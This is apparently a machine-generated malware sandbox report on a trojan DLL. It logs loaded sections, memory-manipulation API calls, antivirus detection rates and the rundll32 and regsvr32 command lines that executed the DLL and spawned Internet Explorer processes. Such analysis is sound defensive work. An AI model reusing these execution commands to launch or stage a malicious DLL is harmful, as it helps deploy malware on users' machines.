            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ~ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: } .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: | .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: { .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ` .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: _ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ^ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ] .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: [ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_005F21D4
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00C7B0DC
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00C75920
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_004021D4
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_005121D4
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0408B0DC
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04085920
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_047BB0DC
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_047B5920
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_04BFB0DC
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_04BF5920
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_04C0B0DC
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_04C05920
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0435B0DC
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_04355920
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0677B0DC
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_06775920
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04FDB0DC
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04FD5920
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_005F10BA NtMapViewOfSection
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_005F1A34 GetProcAddress,NtCreateSection,memset
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_005F23F5 NtQueryVirtualMemory
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00C771B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00C7B2FD NtQueryVirtualMemory
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00C2009C NtAllocateVirtualMemory
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00C2029D NtProtectVirtualMemory
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00C20066 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_00401A34 GetProcAddress,NtCreateSection,memset
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_004010BA NtMapViewOfSection
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_004023F5 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00511A34 GetProcAddress,NtCreateSection,memset
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_005110BA NtMapViewOfSection
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_005123F5 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_040871B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0408B2FD NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_005D0066 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_005D029D NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_005D009C NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_047B71B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_047BB2FD NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_04BF71B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_04BFB2FD NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_04C071B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_04C0B2FD NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_043571B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0435B2FD NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0098009C NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0098029D NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00980066 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_067771B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0677B2FD NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_045A0066 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_045A009C NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_045A029D NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04FD71B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04FDB2FD NtQueryVirtualMemory
            Source: MGrYFpGLQ7.dllVirustotal: Detection: 82%
            Source: MGrYFpGLQ7.dllMetadefender: Detection: 59%
            Source: MGrYFpGLQ7.dllReversingLabs: Detection: 88%
            Source: MGrYFpGLQ7.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C756A2 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00C756A2
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll'
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\MGrYFpGLQ7.dll
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Bighearted
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Soaking
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Turnipy
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82952 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17414 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82954 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Watertight
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Dithery
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anhimae
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82976 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anostraca
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17438 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,DllRegisterServer
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anaerobian
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:83004 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Sparsile
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,DllUnregisterServer
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17452 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:83036 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17470 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{97212EC2-1265-11EC-90E5-ECF4BB570DC9}.dat
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFCC71BE5E716F720A.TMP
            Source: classification engineClassification label: mal88.troj.evad.winDLL@51/187@14/6
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.ini
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: MGrYFpGLQ7.dllStatic PE information: real checksum: 0x247b4 should be: 0x24148
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005F21C3 push ecx; ret 0_2_005F21D3
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005F2170 push ecx; ret 0_2_005F2179
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C7B0CB push ecx; ret 0_2_00C7B0DB
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C7AD10 push ecx; ret 0_2_00C7AD19
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C2009C push dword ptr [ebp-000000D8h]; ret 0_2_00C20252
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C2009C push dword ptr [ebp-000000E0h]; ret 0_2_00C2029C
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C2009C push dword ptr [esp+10h]; ret 0_2_00C203AB
